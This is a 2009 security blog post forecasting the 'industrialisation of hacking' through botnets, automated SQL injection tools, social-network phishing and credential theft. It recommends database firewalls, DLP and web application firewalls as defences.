Cyber Security Institute

§ Current Worries

Top 3 Worries

  • Regulations
  • Old Firewall Configurations
  • Security Awareness

§ Listening

For the best information

  • The underground
  • Audible
  • Executive Excellence
  • Music (to keep me sane)

§ Watching

For early warnings

  • 150 Security Websites
  • AP Newsfeeds
  • Vendors

Tuesday, December 08, 2009

Industrialisation Of Hacking Will Dominate The Next Decade

As we approach the dawn of a new decade, battle lines are firmly drawn with UK Organisation’s squaring up to Cyber Criminals.  The industrialisation of hacking—Clear definitions of roles are developing within the hacking community forming a supply chain that starkly resembles that of drug cartels.  The weapons of choice will be automated tools applied through botnets.  His companyrecently tracked and analysed a compromise that affected hundreds of servers.  The scale of this attack, and others like it, is enormous and would not be achievable without total automation.

· A move from application to data security as cyber-criminals look for new ways to bypass existing security measures and focus on obtaining valuable information.
· Increasing attacks through social network sites where vulnerable and less technically savvy populations are susceptible to phishing attacks and malware infection.
· An increase in credential theft/grabbing attacks.  As the face value of individual credit card records and personal identity records decreases (due to massive data breaches) attackers look at more profitable targets.  Obtaining application credentials presents an up sell opportunity as they provide a greater immediate value to stolen data consumers up the food chain.

· A move from reactive to proactive security as organisations move from sitting back and waiting to be breached, to actively seeking holes and plugging them as well as trying to anticipate attacks before they come to realisation.

Application owners need to get their act together and tackle these trends head on.  Organisations serious about protecting data will need to address not only the application level but also at the source of data.  This will mean introducing of new technologies including a Database Firewalls, File Activity Monitoring, and the next generation of DLP products.  These tools should also be combined together with other technologies such as Web Application Firewalls and classic DLP solutions to allow organization to keep track of dataflow across the enterprise from source to sink.

He sees the automation of hacking as a major issue and technical measures will be needed to combat this trend.

Organisations must look to integrate their protection tools with proactive security measures, admittedly not readily available today, however the security community is currently developing solutions and these will become widely available over the next few years.

The next decade must see the IT security industry rise up and stand shoulder to shoulder if it is to win the fight against cyber-criminals.

­Botnet growers / cultivators whose sole concern is maintaining and increasing botnet communities ­ Attackers who purchase botnets for attacks aimed at extracting sensitive information (or other more specialized tasks) Cyber criminals who acquire sensitive information for the sole purpose of committing fraudulent transactions As with any industrialisation process, automation is the key factor for success.

Indeed we see more and more automated tools being used at all stages of the hacking process.

Proactive search for potential victims relies today on search engine bots rather than random scanning of the network.

Massive attack campaigns rely on zombies sending a predefined set of attack vectors to a list of designated victims.

Attack coordination is done through servers that host a list of commands and targets.

SQL Injection attacks, “Remote File Include” and other application level attacks, once considered the cutting edge techniques manually applied by savvy hackers are now bundled into software tools available for download and use by the new breed of industrial hackers.

Search engines (like Google) are becoming an increasingly vital piece in every attack campaign starting from the search for potential victims, the promotion of infected pages and even as a vehicle for launching the attack vectors themselves.

In the last few days, Imperva tracked and analysed a compromise that affected hundreds of servers injecting malicious code into web pages, these were cross referenced with keywords that scored highly in Google search engine generating traffic and thus creating drive by attacks.

The scale of this attack, and others like it, is enormous and would not be achievable without total automation at all stages of the process.

Organisations must realize that this growing trend leaves no web application out of reach for hackers.

Attack campaigns are constantly launched not only against high profile applications but rather against any available target.

Protecting web applications using application level security solutions will become a must for larger and smaller organisations alike.

End users who want to protect their own personal data and avoid becoming part of a botnet must learn to rely on automatic OS updates and anti-malware software.

Previously attracting student communities, the growing popularity of social networking sites, such as Facebook, Twitter and LinkedIn is fast infiltrating mainstream populations with practically every man, and his dog, now ‘on Facebook’.

Elderly people as well as younger children, people who did not grow up with an inherent distrust in web content may find it very difficult to distinguish between messages of true social nature and widespread attack campaigns.

Attackers will also take advantage of the social networking information made accessible by social platforms to create more credible campaigns (e.g. make sure you get your Phishing email from your grandchildren).

The capabilities offered by the social platform and their growing outreach into other applications (webmail, online games) allow attacker to launch huge campaigns with a viral nature and at the same time pinpoint specific individuals.

Much like searching through the Google search engine for potentials target applications, attackers will scan social networks (using automated tools) for susceptible individuals, further increasing the effectiveness of their attack campaigns.

An entire set of tools that would allow us to evaluate and express personal trust in this virtual society are yet to be developed and put to use by platform owners and consumers.

Even when considering manually executed fraud, it is evident that having multiple sets of valid credentials for an online trading application makes it much more easier than having the personal data of account owners.

Consumers should protect themselves mainly from Trojan and KeyLogger threats by using the latest anti-malware software.

To date the security concept has been largely reactive—waiting for a vulnerability to be disclosed; creating a signature (or some other security rule) then cross referencing requests against these attack methods, regardless of their context in time or source.

Posted on 12/08